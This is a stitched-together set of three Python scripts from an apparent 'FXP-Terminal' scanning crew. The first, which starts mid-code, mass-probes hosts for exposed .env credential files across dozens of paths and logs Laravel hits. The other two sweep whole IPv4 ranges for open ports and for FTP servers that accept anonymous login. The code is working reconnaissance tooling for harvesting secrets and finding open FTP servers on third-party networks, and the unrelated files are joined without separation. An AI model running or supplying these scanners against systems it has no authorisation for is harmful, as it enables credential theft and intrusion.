"/test-network/addOrg3/.env", "/test/.env", "/test/aries-js-worker/fixtures/.env", "/test/bdd/fixtures/adapter-rest/.env", "/test/bdd/fixtures/agent-rest/.env", "/test/bdd/fixtures/couchdb/.env", "/test/bdd/fixtures/demo/.env", "/test/bdd/fixtures/demo/openapi/.env", "/test/bdd/fixtures/did-method-rest/.env", "/test/bdd/fixtures/did-rest/.env", "/test/bdd/fixtures/edv-rest/.env", "/test/bdd/fixtures/openapi-demo/.env", "/test/bdd/fixtures/sidetree-mock/.env", "/test/bdd/fixtures/universalresolver/.env", "/test/bdd/fixtures/vc-rest/.env", "/test/fixtures/.env", "/test/fixtures/app_types/node/.env", "/test/fixtures/app_types/rails/.env", "/test/fixtures/node_path/.env", "/test/integration/env-config/app/.env", "/testfiles/.env", "/testing/docker/.env", "/tests/.env", "/Tests/Application/.env", "/tests/default_settings/v7.0/.env", "/tests/default_settings/v8.0/.env", "/tests/default_settings/v9.0/.env", "/tests/default_settings/v10.0/.env", "/tests/default_settings/v11.0/.env", "/tests/default_settings/v12.0/.env", "/tests/default_settings/v13.0/.env", "/tests/drupal-test/.env", "/tests/Integration/Environment/.env", "/tests/todo-react/.env", "/testwork_json/.env", "/theme_static/.env", "/theme/.env", "/thumb/.env", "/thumbs/.env", "/tiedostot/.env", "/tmp/.env", "/tools/.env", "/Travel_form/.env", "/ts/prime/.env", "/ubuntu/.env", "/ui/.env", "/unixtime/.env", "/unsplash-downloader/.env", "/upfiles/.env", "/upload/.env", "/uploads/.env", "/urlmem-app/.env", "/User_info/.env", "/v1/.env", "/v2/.env", "/var/backup/.env", "/vendor/.env", "/vendor/github.com/gobuffalo/envy/.env", "/vendor/github.com/subosito/gotenv/.env", "/videos/.env", "/vm-docker-compose/.env", "/vod_installer/.env", "/vue_CRM/.env", "/vue-end/vue-til/.env", "/vue/vuecli/.env", "/web-dist/.env", "/web/.env", "/Web/siteMariage/.env", "/webroot_path/.env", "/websocket/.env", "/webstatic/.env", "/webui/.env", "/well-known/.env", "/whturk/.env", "/windows/tests/9.2.x/.env", "/windows/tests/9.3.x/.env", 
"/wp-content/.env", "/www-data/.env", "/www/.env", "/xx-final/vue-heroes/.env", "/zmusic-frontend/.env"], "marks" : ["Laravel", "laravel", "https://laravel.com/", "https://laracon.eu/online/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] laravel:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) class main(): """ Main part which controls the complete program """ def __init__(self, file, timeout = 10): self.file = read_file_ip(file) global scan scan = scan(timeout) def run(self, threads): threads = int(threads) print "\n" print "[INFO] Scanning with %s Thread(s)\n" %threads while True: line = self.file.next_line() if line == False: break while True: if threading.active_count() <= threads: ip_port = line.split(":") if(re.match("((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)",ip_port[0]) != None): ip = ip_port[0] port = ip_port[1].split(" ")[0] t = threading.Thread(target=scan.check, args=(ip, port)) t.deamon = False t.start() break else: break return True if __name__ == "__main__": __version__ = "by FXP-T Team - www.fxp-terminal.info" def help(): print "--------------------------------------------------------------------" print " Schm3ckm0-Ch3ck3R v0.5 " print "- .py <file> results.txt <threads> [timeout] " print "-- *** " print "- Respect to: " print " " print "- ddr, b2r, bwc, il, maro, burnz, chucky, " print "- gil, bebop, Gnu, airy, fake, " print "- dodo, mani, Buster and all i foget 
:D " print "-- *** " print "- " print "- Respect to: " print "- FXP-T Team, [email protected]@R-LightS and Friends, moep, izibitzi, Stylez " print " " print " < Changelog > " print " " print " " print " " print " " print " 28.01.2021 - SSLError Fix , True, False and None , durch getestet " print "-18.01.2021 - diverse path erweiterungen------------------------- " print "-18.01.2021 - module_scan_laravel_and_phpunit hinzugefügt-------- " print "-01.10.2020 - Adminer modul hinzugefügt-------------------------- " print " 03.10.2020 - Scan module erweitert------------------------------ " print " 28.02.2020 - Bug Fixes, Brute Module eing...-------------------- " print " 01.10.2020 - Bug Fixes und kleib tests durchgefürt " print "--------------------------------------------------------------------" if len(sys.argv) == 3: main = main(sys.argv[1]) main.run(sys.argv[2]) elif len(sys.argv) == 4: main = main(sys.argv[1], timeout = sys.argv[3]) main.run(sys.argv[2]) else: help()
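"""Port-/FTP-Scanner

Scans IPv4 address ranges either for open TCP ports or for FTP servers that
accept an anonymous login.

Usage::

    scanner.py port RANGES -p 21,22,80 [-t THREADS]
    scanner.py ftp  RANGES [-t THREADS]

RANGES is a text file with one "START END" pair per line; both ends are
scanned (inclusive), e.g. ``10.0.0.1 10.0.0.254``.

Results are appended to files in the working directory:

    open        "ip:port" for every open port found
    found_ftp   "ip:21 anonymous:anonymous" for every anonymous FTP server
    current_ip  the address most recently dispatched (resume marker)

NOTE(review): this enumerates whole networks; run it only against ranges you
are authorised to scan.
"""
import argparse
import ipaddress
import socket
import sys
import threading
import time

# Several scanner threads append to the result files at once; serialise the writes.
_results_lock = threading.Lock()


def _append_line(path, line):
    """Append one line to *path* and close the file (the original left handles open)."""
    with _results_lock:
        with open(path, "a") as fh:
            fh.write(line + "\n")


def CheckIfOpen(ip, port):
    """TCP-connect to ip:port; record "ip:port" in 'open' and print the verdict.

    Any socket error (refused, timed out, unreachable) counts as closed.
    """
    try:
        # The context manager closes the socket on every path; the original never closed it.
        with socket.create_connection((ip, int(port)), 1.5):
            pass
    except OSError:
        print("Port: " + str(port) + " closed on IP: " + ip + "!\n")
        return
    _append_line("open", ip + ":" + str(port))
    print("Port: " + str(port) + " open on IP: " + ip + "!\n")


def _ftp_reply(sock):
    """Read one FTP reply chunk and decode it; undecodable bytes are replaced, not fatal."""
    return sock.recv(4096).decode("utf-8", "replace")


def CheckIfPub(target, timeout=10.0):
    """Check whether the FTP server on target:21 accepts anonymous/anonymous.

    Records "target:21 anonymous:anonymous" in 'found_ftp' on success and returns
    True. Any connection or protocol error prints "Login failed!" (as the original
    did) and returns False. *timeout* bounds every socket operation - the original
    had none and could hang on a silent host.
    """
    try:
        with socket.create_connection((target, 21), timeout) as sock:
            _ftp_reply(sock)  # greeting banner
            sock.sendall(b"USER anonymous\r\n")
            reply = _ftp_reply(sock)
            # 331 = password required. RFC 959 also allows 230 straight after USER,
            # i.e. login without a password; treat that as success too.
            if reply.startswith("331"):
                sock.sendall(b"PASS anonymous\r\n")
                reply = _ftp_reply(sock)
            if not reply.startswith("230"):
                return False
    except OSError:
        print("Login failed!\n")
        return False
    _append_line("found_ftp", target + ":21 anonymous:anonymous")
    return True


def _ip_range(start, end):
    """Yield every IPv4 address from *start* to *end* inclusive, as dotted strings.

    Replaces the hand-rolled octet arithmetic of the original, which tested
    ``end[1]`` (a character of the end string) instead of ``progress[1]`` when
    carrying into the second octet. Yields nothing when end < start. Raises
    ValueError for a malformed address.
    """
    first = int(ipaddress.IPv4Address(start))
    last = int(ipaddress.IPv4Address(end))
    for value in range(first, last + 1):
        yield str(ipaddress.IPv4Address(value))


def _parse_ports(spec):
    """Turn "21,22,80" into [21, 22, 80]; raise ValueError when missing or malformed."""
    if not spec:
        raise ValueError("port scan needs -p/--ports, e.g. -p 21,22,80")
    return [int(p) for p in spec.split(",") if p.strip()]


def _dispatch(func, args, limit):
    """Run func(*args) on a new thread, waiting while *limit* threads are already alive.

    The original slept 0.2 s when the cap was hit and then started the thread anyway,
    so the cap never held.
    """
    while threading.active_count() > limit:
        time.sleep(0.2)
    worker = threading.Thread(target=func, args=args)
    worker.start()
    return worker


def main(argv=None):
    """Parse the command line and run the selected scan over every range in the file."""
    parser = argparse.ArgumentParser()
    parser.add_argument("scan", type=str, choices=["ftp", "port"], help="decide whether to scan for pubs or ports.")
    parser.add_argument("ranges", type=str, help="specify the file containing the ranges to scan, format: 123.123.123.123 123.123.123.123")
    parser.add_argument("-t", "--threads", type=int, help="specify amount of threads, else the default will be 100.")
    parser.add_argument("-p", "--ports", type=str, help="specify the port or ports to scan if you decided to scan for open ports. format: port1,port2,port3,...")
    args = parser.parse_args(argv)

    threads = args.threads if args.threads else 100
    if args.scan == "port":
        try:
            ports = _parse_ports(args.ports)
        except ValueError as exc:
            parser.error(str(exc))
    else:
        # The original compared against "pub" (not an accepted choice), so in "ftp"
        # mode `ports` was never assigned and the loop below raised NameError.
        ports = [21]

    with open(args.ranges) as fh:
        ranges = fh.read().splitlines()

    for ipranges in ranges:
        parts = ipranges.split()
        if len(parts) < 2:
            if parts:
                print("Skipping malformed range line: " + ipranges, file=sys.stderr)
            continue
        try:
            addresses = list(_ip_range(parts[0], parts[1]))
        except ValueError as exc:
            print("Skipping range line (" + str(exc) + "): " + ipranges, file=sys.stderr)
            continue
        for current in addresses:
            for port in ports:
                if args.scan == "port":
                    _dispatch(CheckIfOpen, (current, int(port)), threads)
                else:
                    _dispatch(CheckIfPub, (current,), threads)
            # Resume marker: the address just dispatched.
            with open("current_ip", "w") as fh:
                fh.write(current)

    # Wait for every scanner thread, not just the last one started.
    for worker in threading.enumerate():
        if worker is not threading.current_thread():
            worker.join()
    print("Scan finished!\n")


if __name__ == "__main__":
    main()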
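import ipaddress
import socket
import sys
import threading
import time

###
# PRIVATE AND INTERNAL PORTSCANNER
# BY: jan0x
# FOR: FXP-Terminal and Datenreiter
# VERSION: 0.1
# HOW:
# ranges.txt with ranges in CIDR Notation line by line (blank lines and
# lines starting with "#" are ignored).
# Add Ports in Main (Main.PORTS)
# Switch Modes between "ip" and "port" in Main __init__ function
#
# NOTE(review): scans whole networks - only point it at ranges you are
# authorised to test.
###

# scan_port() is called from many threads at once; serialise the result-file appends.
_RESULTS_LOCK = threading.Lock()


###
# Target Generator
# Uses a list of ip-networks and ports and returns a target
###
class Targets:
    """Generate [ip, port] scan targets from CIDR networks and a port list.

    mode "ip":   every port of one host before moving on to the next host.
    mode "port": every host for one port before moving on to the next port.
    """

    MODES = ("ip", "port")

    def __init__(self, mode):
        # Raise instead of sys.exit(): a library class should not terminate the process.
        if mode not in self.MODES:
            raise ValueError("Incorrect scanmode: %r (expected one of %s)" % (mode, ", ".join(self.MODES)))
        self.mode = mode
        self.networks = []
        self.ports = []

    def add_range(self, cidr_range):
        """Add a network; host bits are tolerated (strict=False), e.g. "10.0.0.5/24"."""
        self.networks.append(ipaddress.ip_network(cidr_range, strict=False))

    def add_ports(self, port_list):
        """Add every port of *port_list* (duplicates are dropped)."""
        for port in port_list:
            self.add_port(port)

    def add_port(self, port):
        """Add one port unless it is already present; insertion order is kept."""
        if port not in self.ports:
            self.ports.append(port)

    def next_target(self):
        """Yield [ip, port] pairs in the order selected by self.mode.

        Addresses come from ip_network.hosts(); NOTE(review): for a /32 that
        yields nothing on older Python versions - confirm if single hosts matter.
        """
        if self.mode == "ip":
            for network in self.networks:
                for ip in network.hosts():
                    for port in self.ports:
                        yield [ip, port]
        else:
            for port in self.ports:
                for network in self.networks:
                    for ip in network.hosts():
                        yield [ip, port]


###
# Port Scanner logic
###
class Scan:
    """Connect-scan every target on its own thread, at most thread_count at a time."""

    def __init__(self, cidr_ranges, ports, thread_count=20, timeout=5, scan_mode="ip"):
        self.thread_count = thread_count
        self.timeout = timeout
        self.targets = Targets(scan_mode)
        for cidr_range in cidr_ranges:
            self.targets.add_range(cidr_range)
        self.targets.add_ports(ports)
        # A real cap on in-flight scans. The original only slowed the spawn rate
        # (sleep(timeout / thread_count)) and could still pile up unbounded threads.
        self._slots = threading.BoundedSemaphore(max(1, int(thread_count)))

    def run(self):
        """Scan all targets; returns once every scan thread has finished."""
        workers = []
        for target in self.targets.next_target():
            self._slots.acquire()  # blocks while thread_count scans are in flight
            worker = threading.Thread(target=self._scan_and_release, args=(target, self.timeout))
            worker.start()
            # Keep only live workers so the list stays bounded by thread_count.
            workers = [w for w in workers if w.is_alive()]
            workers.append(worker)
        # Join our own workers; the original spun on active_count() != 1, which never
        # returns if any other thread exists in the process.
        for worker in workers:
            worker.join()

    def _scan_and_release(self, target, timeout):
        """Thread body: run scan_port and free the semaphore slot whatever happens."""
        try:
            self.scan_port(target, timeout)
        finally:
            self._slots.release()

    def scan_port(self, target, timeout=5):
        """Connect to target = [ip, port]; on success append "ip:port" to results.txt.

        *ip* is an ipaddress address object (as produced by Targets). Returns [True]
        when the connect succeeded, [False, error_text] otherwise.
        """
        ip, port = target
        family = socket.AF_INET6 if ip.version == 6 else socket.AF_INET
        sock = socket.socket(family, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((ip.exploded, port))
        except socket.error as e:
            return [False, str(e)]
        finally:
            sock.close()  # the original never closed the socket, open or not
        with _RESULTS_LOCK:
            with open('results.txt', 'a') as result_file:
                result_file.write("{}:{}\n".format(ip.exploded, port))
        return [True]


###
# Handle console input
###
class Main:
    """Console entry point: reads ranges.txt and runs the scan with fixed settings."""

    RANGES_FILE = "ranges.txt"
    PORTS = [80, 8080, 443]

    def __init__(self):
        self.ranges = []
        with open(self.RANGES_FILE, "r") as range_file:
            for line in range_file:
                line = line.strip()
                # Skip blanks and comments: ip_network("") raises ValueError.
                if line and not line.startswith("#"):
                    self.ranges.append(line)
        self.scanner = Scan(self.ranges, self.PORTS, thread_count=100, timeout=5, scan_mode="port")

    def run(self):
        self.scanner.run()


if __name__ == "__main__":
    main = Main()
    main.run()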